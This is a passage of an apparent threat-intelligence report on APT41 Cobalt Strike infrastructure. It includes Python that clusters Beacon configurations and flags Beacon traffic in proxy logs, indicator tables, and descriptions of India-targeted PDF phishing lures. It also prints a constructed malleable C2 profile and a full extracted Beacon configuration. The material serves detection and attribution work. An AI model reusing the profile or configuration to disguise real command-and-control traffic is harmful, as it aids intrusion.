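    return sorted(n for n, c in configs.items() if len(shared_fields(c, profile)) >= min_shared)


# Constructed profile in the style of public jQuery profiles; Host mirrors the bootcss pivot.
JQUERY_PROFILE = '''
http-get {
    set uri "/jquery-3.3.1.min.js";
    client {
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
        header "Host" "cdn.bootcss.com";
        header "Referer" "http://cdn.bootcss.com/";
        metadata { base64url; prepend "__cfduid="; header "Cookie"; }
    }
}
http-post {
    set uri "/jquery-3.3.2.min.js";
    client { header "Host" "cdn.bootcss.com"; }
}
'''
JQUERY_FIELDS = parse_profile(JQUERY_PROFILE)
MS_LOOKALIKE = {  # constructed second profile, imitating documentation-site traffic
    "http-get.header.host": "docs-lookalike.invalid",
    "http-get.header.user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
    "http-get.header.accept": "*/*",
    "http-get.header.referer": "https://docs-lookalike.invalid/",
}
# Constructed Beacon configs, flattened the way a config extractor would emit them.
BEACON_CONFIGS = {
    "beacon-A": {"c2": "cdn-a.invalid", **JQUERY_FIELDS},
    "beacon-B": {"c2": "cdn-b.invalid", **JQUERY_FIELDS, "http-get.uri": "/jquery-3.4.0.min.js"},
    "beacon-C": {"c2": "docs-c.invalid", **MS_LOOKALIKE, "http-get.uri": "/en-us/library/"},
    "beacon-D": {"c2": "docs-d.invalid", **MS_LOOKALIKE, "http-get.uri": "/en-us/updates/"},
    "beacon-E": {"c2": "loner.invalid", "http-get.uri": "/ca", "http-get.header.accept": "*/*"},
}

if __name__ == "__main__":
    for group in cluster(BEACON_CONFIGS):
        print(group, [BEACON_CONFIGS[n]["c2"] for n in group])
```

Raising `min_shared` tightens clusters; a single shared field such as the `*/*` Accept header is not enough to link beacon-E to the documentation-lookalike cluster.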
The Beacons served by these new nodes are using a different malleable profile to those in the original cluster that attempts to make the Beacon traffic look like legitimate Microsoft traffic.
| IP | Domain |
| --- | --- |
| 144.202.98.198 | zalofilescdn[.]com |
| 107.182.24.70 | isbigfish[.]xyz |
| 185.14.29.72 | www[.]microsoftbooks[.]dns-dns[.]com |
| 193.42.114.73 | www[.]microsoftbooks.dns-dns[.]com |
| 149.28.78.89 | www[.]mlcrosoft[.]site |
| 23.67.95.153 | ns[.]mircosoftdoc[.]com |
| 104.27.132.211 | cdn[.]microsoftdocs[.]workers[.]dev, ccdn[.]microsoftdocs[.]workers[.]dev |
The domains we found share similarities in their naming convention, which tries to masquerade as legitimate Microsoft® domains. Searching for these IPs and domains in a variety of open source intelligence (OSINT) repositories reveals some connections that bear further examination. The IP 107.182.24[.]70 as well as the domain www[.]mlcrosoft[.]site both appear within a blog from Positive Technologies. Further hunting for the IP address 149.28.78[.]89 reveals links to a campaign mentioned in the previously referenced Prevailion blog.
Gh0st in the Machine
In that blog, we can find two IOCs that appear in the cluster above: the IP 149.28.78.89 and the domain mlcrosoft.site. The blog associated those IOCs with the Higaisa advanced persistent threat (APT) group, which operates out of North Korea.
The domain mlcrosoft[.]site also appears in the blog from Positive Technologies. That article has additional overlapping IOCs, and talks about the same campaign as mentioned in the Prevailion blog. However, it makes a strong argument that the activity is from APT41 rather than Higaisa APT.
When we do a side-by-side comparison of the domains from the Positive Technologies blog and our datasets, there is a strong similarity between naming conventions used:
| BlackBerry IOCs | Positive Technologies IOCs |
| --- | --- |
| www[.]microsoftbooks.dns-dns[.]com | microsoftbooks[.]dynamic-dns[.]net |
| cdn[.]microsoftdocs.workers[.]dev | microsoftdocs[.]dns05[.]com |
| ccdn[.]microsoftdocs.workers[.]dev | ns[.]microsoftdocs.dns05[.]com |
| ns[.]mircosoftdoc[.]com | ns1[.]microsoftsonline[.]net |
We also discovered that mlcrosoft[.]site and mircosoftdoc[.]com both appear in the Azure-Sentinel detection rule for known Barium phishing domains. The IP 144.202.98[.]198 has also been previously associated with APT41/Barium by a Microsoft researcher.
Another IP from this cluster, 185.14.29[.]72, was recently providing virtual hosting for several domain names such as:
chaindefend[.]bid
defendchain[.]xyz
assistcustody[.]xyz
microsoftonlineupdate.dynamic-dns[.]net
Previously, this IP has been associated with DNS resolutions for schememicrosoft[.]com and www.microsoftbooks[.]dns-dns.com. Several of the domains also have links to 209.99.40[.]222, an IP that is known to perform malicious DNS/bulletproof hosting.
As of Sept. 14, 2021, this IP resolved to a new domain very briefly: www.microsoftonlineupdate.dynamic-dns[.]net. This domain also conforms to a naming convention similar to those we have seen in the previous table.
Figure 3: Teamserver geolocation
Phishing Lures
By performing further intelligence correlation on these URLs, we found a malicious PDF that reaches out to ccdn[.]microsoftdocs.workers[.]dev. This site had previously hosted a Cobalt Strike Team Server.
Further digging reveals a set of three PDFs used as malicious phishing lures, which are linked to the *.microsoftdocs.workers[.]dev domains. These lures all target victims in India, either promising information regarding new India-specific income taxation rules or COVID-19 advisories.
The first lure – “Income tax new rules for NRI.pdf.lnk” – contains both a PDF document and an embedded PowerShell script. Upon execution, the PDF is displayed to the user, after which the PowerShell is executed in the background.
Figure 4: Phishing lure 1
The PowerShell script downloads and executes a payload via “%temp%\conhost.exe,” which loads a payload file called "event.dat." This .DAT file is a Cobalt Strike Beacon.
The second and third lures each have similar execution flows and component parts: a PDF lure, conhost.exe, and an event.* payload. In this case, these event files had a .LOG extension rather than .DAT.
The biggest difference between the second and third lures is that one uses a self-extracting archive named “India records highest ever single day covid_19 recoveries.pdf.exe,” and the other uses a ZIP file named “India records highest ever single day COVID-19 recoveries.zip.”
Figure 5: Contents of lures 2 and 3
Lures two and three also contain the same information within their respective PDFs. Both relate to a record high number of COVID-19 recoveries in India, information which purports to be from the Indian Government Ministry of Health & Family Welfare.
Figure 6: Phishing lure 2 and 3 PDF contents
By extracting the configurations from each of the three lures’ event.* Beacon payloads, we can see that the C2 server address used in the configuration data differs slightly:
Lure-1 uses ccdn[.]microsoftdocs.workers.dev/en-us/windows/apps/
Lure-2 & 3 use cdn[.]microsoftdocs.workers.dev/en-us/windows/apps/
The same can be seen for the HttpGet_Metadata and HttpPost_Metadata host addresses:
Lure-1 uses ccdn[.]microsoftdocs.workers.dev
Lure-2 & 3 use cdn[.]microsoftdocs.workers.dev
| KEY | VALUE |
| --- | --- |
| BeaconType | HTTPS |
| Port | 443 |
| SleepTime | 1000 |
| MaxGetSize | 1398104 |
| Jitter | 0 |
| MaxDNS | 255 |
| C2Server | ccdn[.]microsoftdocs.workers.dev,/en-us/windows/apps/ (Lure 1); cdn[.]microsoftdocs.workers.dev,/en-us/windows/apps/ (Lure 2&3) |
| UserAgent | Mozilla/5.0 (MSIE 10; Windows NT 6.1; Trident/5.0) |
| HttpPostUri | /en-us/windows/windows-server/ |
| Malleable_C2_Instructions | Base64 decode |
| HttpGet_Metadata | ConstHeaders: Host: ccdn[.]microsoftdocs.workers.dev (Lure 1) / Host: cdn[.]microsoftdocs.workers.dev (Lure 2&3); User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/5.0); Accept: */*; Accept-Encoding: gzip, deflate, br. Metadata: base64; prepend "__cfduid="; header "Cookie" |
| HttpPost_Metadata | ConstHeaders: Host: ccdn[.]microsoftdocs.workers.dev (Lure 1) / Host: cdn[.]microsoftdocs.workers.dev (Lure 2&3); User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/5.0); Accept: */*; Accept-Encoding: gzip, deflate, br. SessionId: base64url; parameter "k". Output: base64 |
| DNS_Idle | 104.88.34.55 |
| DNS_Sleep | 0 |
| HttpGet_Verb | GET |
| HttpPost_Verb | POST |
| HttpPostChunk | 0 |
| Spawnto_x86 | %windir%\syswow64\gpupdate.exe |
| Spawnto_x64 | %windir%\sysnative\gpupdate.exe |
| CryptoScheme | 0 |
| Proxy_Behavior | Use IE settings |
| Watermark | 305419896 |
| bStageCleanup | False |
| bCFGCaution | False |
| KillDate | 0 |
| bProcInject_StartRWX | True |
| bProcInject_UseRWX | True |
| bProcInject_MinAllocSize | 0 |
| ProcInject_PrependAppend_x86 | Empty |
| ProcInject_PrependAppend_x64 | Empty |
| ProcInject_Execute | CreateThread; SetThreadContext; CreateRemoteThread; RtlCreateUserThread |
| ProcInject_AllocationMethod | VirtualAllocEx |
| bUsesCookies | True |
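To show how the HttpGet_Metadata and HttpPost_Metadata instructions in that configuration translate into something a defender can look for, here is an added Python example (not from the BlackBerry post) that scores proxy log lines against the profile's Host, User-Agent, URI, Cookie and query-parameter traits; the tab-separated log format and the sample lines are constructed assumptions, and the host suffix generalises over the cdn/ccdn variants seen across the three lures.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Traits taken from the Beacon configuration table above; the suffix covers
# both the cdn and ccdn hosts used by the three lures.
PROFILE_HOST_SUFFIX = "microsoftdocs.workers.dev"
PROFILE_UA = "Mozilla/5.0 (Windows NT 6.1; Trident/5.0)"
GET_URI, POST_URI = "/en-us/windows/apps/", "/en-us/windows/windows-server/"
B64 = re.compile(r"[A-Za-z0-9+/]+={0,2}")
B64URL = re.compile(r"[A-Za-z0-9_-]+={0,2}")
HEXSTR = re.compile(r"[0-9a-f]+")

# Constructed proxy log lines (assumed format: method, URL, User-Agent, Cookie,
# tab separated). The first two mimic Beacon check-ins; the third is benign.
SAMPLE_LOG = [
    "GET\thttps://ccdn.microsoftdocs.workers.dev/en-us/windows/apps/\tMozilla/5.0 (Windows NT 6.1; Trident/5.0)\t__cfduid=AAECAwQFBgcICQoLDA0ODw==",
    "POST\thttps://cdn.microsoftdocs.workers.dev/en-us/windows/windows-server/?k=AAECAwQFBgcICQoLDA0ODw\tMozilla/5.0 (Windows NT 6.1; Trident/5.0)\t",
    "GET\thttps://www.example.test/en-us/windows/apps/\tMozilla/5.0 (X11; Linux x86_64)\t__cfduid=d1e2f3a4b5c6",
]

def parse_line(line):
    method, url, ua, cookie = line.rstrip("\n").split("\t")
    parts = urlsplit(url)
    cookies = dict(i.strip().partition("=")[::2] for i in cookie.split(";") if i.strip())
    return {"method": method, "host": parts.hostname or "", "path": parts.path,
            "query": parse_qs(parts.query), "ua": ua, "cookies": cookies}

def score_request(req):
    """Return (score, reasons): one point per profile trait the request shows."""
    reasons = []
    if req["host"].endswith(PROFILE_HOST_SUFFIX):
        reasons.append("host matches lure C2 domain pattern")
    if req["ua"] == PROFILE_UA:
        reasons.append("User-Agent matches Beacon ConstHeaders")
    if req["method"] == "GET" and req["path"] == GET_URI:
        cf = req["cookies"].get("__cfduid", "")
        # Cloudflare's real __cfduid was a hex string; the profile instead
        # prepends that name to padded base64 Beacon metadata.
        if cf and B64.fullmatch(cf) and len(cf) % 4 == 0 and not HEXSTR.fullmatch(cf):
            reasons.append("GET with base64 metadata in __cfduid cookie")
    if req["method"] == "POST" and req["path"] == POST_URI:
        k = req["query"].get("k", [""])[0]
        if k and B64URL.fullmatch(k):
            reasons.append("POST with base64url session id in parameter k")
    return len(reasons), reasons

def flag_beacon_traffic(lines, threshold=3):
    """(method, host) of every line showing at least threshold profile traits."""
    return [(r["method"], r["host"]) for r in map(parse_line, lines)
            if score_request(r)[0] >= threshold]
```

The threshold matters because each trait on its own is weak (the cookie name was once set by Cloudflare on countless legitimate sites); only the combination of host pattern, fixed User-Agent, profile URI and encoded metadata is distinctive.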
A report by Subex from September 2020 described a campaign using similar phishing lures, also targeting Indian nationals, which they attributed to the Evilnum APT group. The indicators of compromise (IOCs) in this report are quite similar (or even identical) to those of the phishing lures we’ve previously investigated. We believe that this attack was perpetrated by APT41 and not the Evilnum group for several reasons:
The first is that the event.* payloads are in fact Cobalt Strike Beacons, as per the extracted configuration data shown in the table above. This behavior is indicative of APT41 rather than the Golden Chickens Malware-as-a-Service (MaaS), as reported in the Subex Evilnum APT report.
The second reason is that there are several configuration settings that indicate APT41 activity when they’re aggregated. These same settings were present within the phishing lure Beacons and have been observed in previous attacks by this group.
In addition to this, the aforementioned blog from Positive Technologies contained overlapping infrastructure that ties in with what we have observed. They documented similar phishing lures using PDF documents as bait, which they attributed to APT41.
These lures follow a similar naming convention to the ones we’ve documented here. Their execution chains encompass both a loader and payload component, but Cobalt Strike was just one of several potential payloads that were listed.
The use of spear-phishing attachments to gain initial access has been a known APT41 tool, technique and procedure (TTP) for years. In addition, the previously discussed overlap in network infrastructure adds credence to this being an APT41-affiliated campaign.
Conclusions
It’s a rare treat for a research organization to have a truly robust set of data about any one threat. Having a security industry that puts a strong emphasis on the public sharing of information means that we can put our collective heads together to create a more complete picture.
An article posted by FireEye initially pointed us to a Malleable C2 profile for Cobalt Strike. We researched this and found a similar profile that had Beacons using the BootCSS domain as part of their configuration. This then pointed us to additional overlapping configuration metadata within the Beacon configuration, which subsequently steered us into identifying a whole new cluster and a new set of domains.
This discovery led us to find connections with the campaign referenced in the Prevailion post, which ushered us into seeing overlaps within the IOCs in the Positive Technologies blog. We found that these IOCs also overlap with those of the Azure-Sentinel detection rule for the APT41 threat actor group.
When we looked deeper into the activities of the threats within these clusters, the similarities continued. Reports from Subex and Positive Technologies described campaigns using PDF files that lured people in with a variety of tactics, including leveraging people’s desire to see information indicating a swift end to the COVID-19 pandemic.
With the resources of a nation-state level threat group, it’s possible to create a truly staggering level of diversity in a threat infrastructure. And while no one security group has that same level of funding, by pooling our collective brainpower we can still uncover the tracks that the cybercriminals involved worked so hard to hide.
Indicators of Compromise (IoCs)
Please view our GitHub for the IoCs referenced in this report: https://github.com/blackberry/threat-research-and-intelligence/blob/main/APT41.csv
Want to learn more about cyber threat hunting? Check out the BlackBerry Research & Intelligence Team’s new book, Finding Beacons in the Dark: A Guide to Cyber Threat Intelligence - now available for pre-order here.
About The BlackBerry Research & Intelligence Team
The BlackBerry Research & Intelligence team examines emerging and persistent threats, providing intelligence analysis for the benefit of defenders and the organizations they serve.